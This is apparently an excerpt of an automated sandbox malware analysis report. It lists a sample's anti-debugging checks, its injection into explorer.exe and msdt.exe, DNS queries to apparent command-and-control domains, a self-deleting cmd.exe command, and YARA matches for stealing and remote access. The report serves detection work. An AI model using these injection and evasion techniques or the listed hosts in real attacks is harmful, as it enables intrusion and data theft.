Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACB1E1 mov eax, dword ptr fs:[00000030h] 2_2_04ACB1E1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADD5E0 mov eax, dword ptr fs:[00000030h] 2_2_04ADD5E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADD5E0 mov eax, dword ptr fs:[00000030h] 2_2_04ADD5E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8FDE2 mov eax, dword ptr fs:[00000030h] 2_2_04B8FDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8FDE2 mov eax, dword ptr fs:[00000030h] 2_2_04B8FDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8FDE2 mov eax, dword ptr fs:[00000030h] 2_2_04B8FDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8FDE2 mov eax, dword ptr fs:[00000030h] 2_2_04B8FDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B541E8 mov eax, dword ptr fs:[00000030h] 2_2_04B541E8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h] 2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h] 2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h] 2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46DC9 mov ecx, dword ptr fs:[00000030h] 2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h] 2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B46DC9 mov eax, dword ptr fs:[00000030h] 2_2_04B46DC9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8E539 mov eax, dword ptr fs:[00000030h] 2_2_04B8E539
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B4A537 mov eax, dword ptr fs:[00000030h] 2_2_04B4A537
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B98D34 mov eax, dword ptr fs:[00000030h] 2_2_04B98D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE4120 mov eax, dword ptr fs:[00000030h] 2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE4120 mov eax, dword ptr fs:[00000030h] 2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE4120 mov eax, dword ptr fs:[00000030h] 2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE4120 mov eax, dword ptr fs:[00000030h] 2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE4120 mov ecx, dword ptr fs:[00000030h] 2_2_04AE4120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF4D3B mov eax, dword ptr fs:[00000030h] 2_2_04AF4D3B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF4D3B mov eax, dword ptr fs:[00000030h] 2_2_04AF4D3B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF4D3B mov eax, dword ptr fs:[00000030h] 2_2_04AF4D3B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF513A mov eax, dword ptr fs:[00000030h] 2_2_04AF513A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF513A mov eax, dword ptr fs:[00000030h] 2_2_04AF513A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD3D34 mov eax, dword ptr fs:[00000030h] 2_2_04AD3D34
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACAD30 mov eax, dword ptr fs:[00000030h] 2_2_04ACAD30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC9100 mov eax, dword ptr fs:[00000030h] 2_2_04AC9100
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC9100 mov eax, dword ptr fs:[00000030h] 2_2_04AC9100
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC9100 mov eax, dword ptr fs:[00000030h] 2_2_04AC9100
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACC962 mov eax, dword ptr fs:[00000030h] 2_2_04ACC962
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEC577 mov eax, dword ptr fs:[00000030h] 2_2_04AEC577
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEC577 mov eax, dword ptr fs:[00000030h] 2_2_04AEC577
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACB171 mov eax, dword ptr fs:[00000030h] 2_2_04ACB171
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACB171 mov eax, dword ptr fs:[00000030h] 2_2_04ACB171
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEB944 mov eax, dword ptr fs:[00000030h] 2_2_04AEB944
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEB944 mov eax, dword ptr fs:[00000030h] 2_2_04AEB944
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B03D43 mov eax, dword ptr fs:[00000030h] 2_2_04B03D43
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B43540 mov eax, dword ptr fs:[00000030h] 2_2_04B43540
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE7D50 mov eax, dword ptr fs:[00000030h] 2_2_04AE7D50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h] 2_2_04AC52A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h] 2_2_04AC52A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h] 2_2_04AC52A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h] 2_2_04AC52A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC52A5 mov eax, dword ptr fs:[00000030h] 2_2_04AC52A5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B446A7 mov eax, dword ptr fs:[00000030h] 2_2_04B446A7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B90EA5 mov eax, dword ptr fs:[00000030h] 2_2_04B90EA5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B90EA5 mov eax, dword ptr fs:[00000030h] 2_2_04B90EA5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B90EA5 mov eax, dword ptr fs:[00000030h] 2_2_04B90EA5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADAAB0 mov eax, dword ptr fs:[00000030h] 2_2_04ADAAB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADAAB0 mov eax, dword ptr fs:[00000030h] 2_2_04ADAAB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFFAB0 mov eax, dword ptr fs:[00000030h] 2_2_04AFFAB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5FE87 mov eax, dword ptr fs:[00000030h] 2_2_04B5FE87
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFD294 mov eax, dword ptr fs:[00000030h] 2_2_04AFD294
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFD294 mov eax, dword ptr fs:[00000030h] 2_2_04AFD294
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2AE4 mov eax, dword ptr fs:[00000030h] 2_2_04AF2AE4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF16E0 mov ecx, dword ptr fs:[00000030h] 2_2_04AF16E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD76E2 mov eax, dword ptr fs:[00000030h] 2_2_04AD76E2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF36CC mov eax, dword ptr fs:[00000030h] 2_2_04AF36CC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2ACB mov eax, dword ptr fs:[00000030h] 2_2_04AF2ACB
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B98ED6 mov eax, dword ptr fs:[00000030h] 2_2_04B98ED6
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B7FEC0 mov eax, dword ptr fs:[00000030h] 2_2_04B7FEC0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B08EC7 mov eax, dword ptr fs:[00000030h] 2_2_04B08EC7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B7FE3F mov eax, dword ptr fs:[00000030h] 2_2_04B7FE3F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACE620 mov eax, dword ptr fs:[00000030h] 2_2_04ACE620
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B04A2C mov eax, dword ptr fs:[00000030h] 2_2_04B04A2C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B04A2C mov eax, dword ptr fs:[00000030h] 2_2_04B04A2C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD8A0A mov eax, dword ptr fs:[00000030h] 2_2_04AD8A0A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACC600 mov eax, dword ptr fs:[00000030h] 2_2_04ACC600
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACC600 mov eax, dword ptr fs:[00000030h] 2_2_04ACC600
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACC600 mov eax, dword ptr fs:[00000030h] 2_2_04ACC600
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF8E00 mov eax, dword ptr fs:[00000030h] 2_2_04AF8E00
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B81608 mov eax, dword ptr fs:[00000030h] 2_2_04B81608
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AE3A1C mov eax, dword ptr fs:[00000030h] 2_2_04AE3A1C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFA61C mov eax, dword ptr fs:[00000030h] 2_2_04AFA61C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFA61C mov eax, dword ptr fs:[00000030h] 2_2_04AFA61C
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACAA16 mov eax, dword ptr fs:[00000030h] 2_2_04ACAA16
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACAA16 mov eax, dword ptr fs:[00000030h] 2_2_04ACAA16
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC5210 mov eax, dword ptr fs:[00000030h] 2_2_04AC5210
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC5210 mov ecx, dword ptr fs:[00000030h] 2_2_04AC5210
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC5210 mov eax, dword ptr fs:[00000030h] 2_2_04AC5210
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC5210 mov eax, dword ptr fs:[00000030h] 2_2_04AC5210
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD766D mov eax, dword ptr fs:[00000030h] 2_2_04AD766D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B0927A mov eax, dword ptr fs:[00000030h] 2_2_04B0927A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B7B260 mov eax, dword ptr fs:[00000030h] 2_2_04B7B260
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B7B260 mov eax, dword ptr fs:[00000030h] 2_2_04B7B260
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B98A62 mov eax, dword ptr fs:[00000030h] 2_2_04B98A62
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h] 2_2_04AEAE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h] 2_2_04AEAE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h] 2_2_04AEAE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h] 2_2_04AEAE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEAE73 mov eax, dword ptr fs:[00000030h] 2_2_04AEAE73
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B54257 mov eax, dword ptr fs:[00000030h] 2_2_04B54257
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC9240 mov eax, dword ptr fs:[00000030h] 2_2_04AC9240
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC9240 mov eax, dword ptr fs:[00000030h] 2_2_04AC9240
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC9240 mov eax, dword ptr fs:[00000030h] 2_2_04AC9240
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC9240 mov eax, dword ptr fs:[00000030h] 2_2_04AC9240
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h] 2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h] 2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h] 2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h] 2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h] 2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD7E41 mov eax, dword ptr fs:[00000030h] 2_2_04AD7E41
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8EA55 mov eax, dword ptr fs:[00000030h] 2_2_04B8EA55
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8AE44 mov eax, dword ptr fs:[00000030h] 2_2_04B8AE44
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8AE44 mov eax, dword ptr fs:[00000030h] 2_2_04B8AE44
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF4BAD mov eax, dword ptr fs:[00000030h] 2_2_04AF4BAD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF4BAD mov eax, dword ptr fs:[00000030h] 2_2_04AF4BAD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF4BAD mov eax, dword ptr fs:[00000030h] 2_2_04AF4BAD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B95BA5 mov eax, dword ptr fs:[00000030h] 2_2_04B95BA5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B47794 mov eax, dword ptr fs:[00000030h] 2_2_04B47794
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B47794 mov eax, dword ptr fs:[00000030h] 2_2_04B47794
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B47794 mov eax, dword ptr fs:[00000030h] 2_2_04B47794
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD1B8F mov eax, dword ptr fs:[00000030h] 2_2_04AD1B8F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD1B8F mov eax, dword ptr fs:[00000030h] 2_2_04AD1B8F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8138A mov eax, dword ptr fs:[00000030h] 2_2_04B8138A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B7D380 mov ecx, dword ptr fs:[00000030h] 2_2_04B7D380
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF2397 mov eax, dword ptr fs:[00000030h] 2_2_04AF2397
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AD8794 mov eax, dword ptr fs:[00000030h] 2_2_04AD8794
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFB390 mov eax, dword ptr fs:[00000030h] 2_2_04AFB390
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B037F5 mov eax, dword ptr fs:[00000030h] 2_2_04B037F5
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEDBE9 mov eax, dword ptr fs:[00000030h] 2_2_04AEDBE9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h] 2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h] 2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h] 2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h] 2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h] 2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF03E2 mov eax, dword ptr fs:[00000030h] 2_2_04AF03E2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B453CA mov eax, dword ptr fs:[00000030h] 2_2_04B453CA
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B453CA mov eax, dword ptr fs:[00000030h] 2_2_04B453CA
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC4F2E mov eax, dword ptr fs:[00000030h] 2_2_04AC4F2E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AC4F2E mov eax, dword ptr fs:[00000030h] 2_2_04AC4F2E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFE730 mov eax, dword ptr fs:[00000030h] 2_2_04AFE730
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFA70E mov eax, dword ptr fs:[00000030h] 2_2_04AFA70E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFA70E mov eax, dword ptr fs:[00000030h] 2_2_04AFA70E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B8131B mov eax, dword ptr fs:[00000030h] 2_2_04B8131B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5FF10 mov eax, dword ptr fs:[00000030h] 2_2_04B5FF10
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B5FF10 mov eax, dword ptr fs:[00000030h] 2_2_04B5FF10
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B9070D mov eax, dword ptr fs:[00000030h] 2_2_04B9070D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B9070D mov eax, dword ptr fs:[00000030h] 2_2_04B9070D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AEF716 mov eax, dword ptr fs:[00000030h] 2_2_04AEF716
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACDB60 mov ecx, dword ptr fs:[00000030h] 2_2_04ACDB60
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADFF60 mov eax, dword ptr fs:[00000030h] 2_2_04ADFF60
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B98F6A mov eax, dword ptr fs:[00000030h] 2_2_04B98F6A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF3B7A mov eax, dword ptr fs:[00000030h] 2_2_04AF3B7A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF3B7A mov eax, dword ptr fs:[00000030h] 2_2_04AF3B7A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B98B58 mov eax, dword ptr fs:[00000030h] 2_2_04B98B58
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACDB40 mov eax, dword ptr fs:[00000030h] 2_2_04ACDB40
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ADEF40 mov eax, dword ptr fs:[00000030h] 2_2_04ADEF40
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04ACF358 mov eax, dword ptr fs:[00000030h] 2_2_04ACF358
Source: C:\Users\user\Desktop\7pECKdsaig.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\msdt.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A8ACE0 LdrLoadDll, 0_2_00A8ACE0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Domain query: www.controlplus.systems
Source: C:\Windows\explorer.exe Domain query: www.mogi.africa
Source: C:\Windows\explorer.exe Domain query: www.kellnovaglobalfood.info
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Users\user\Desktop\7pECKdsaig.exe Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: B60000
Source: C:\Users\user\Desktop\7pECKdsaig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\7pECKdsaig.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Users\user\Desktop\7pECKdsaig.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\7pECKdsaig.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\7pECKdsaig.exe Thread register set: target process: 3452
Source: C:\Windows\SysWOW64\msdt.exe Thread register set: target process: 3452
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\7pECKdsaig.exe"
Source: explorer.exe, 00000001.00000000.254881372.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000002.518259542.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: XProgram Manager
Source: explorer.exe, 00000001.00000000.254881372.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.263735895.000000000833A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.254881372.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.254183869.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.518259542.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.254881372.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000002.518259542.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock

Stealing of Sensitive Information

Source: Yara match File source: 7pECKdsaig.exe, type: SAMPLE
Source: Yara match File source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 7pECKdsaig.exe, type: SAMPLE
Source: Yara match File source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY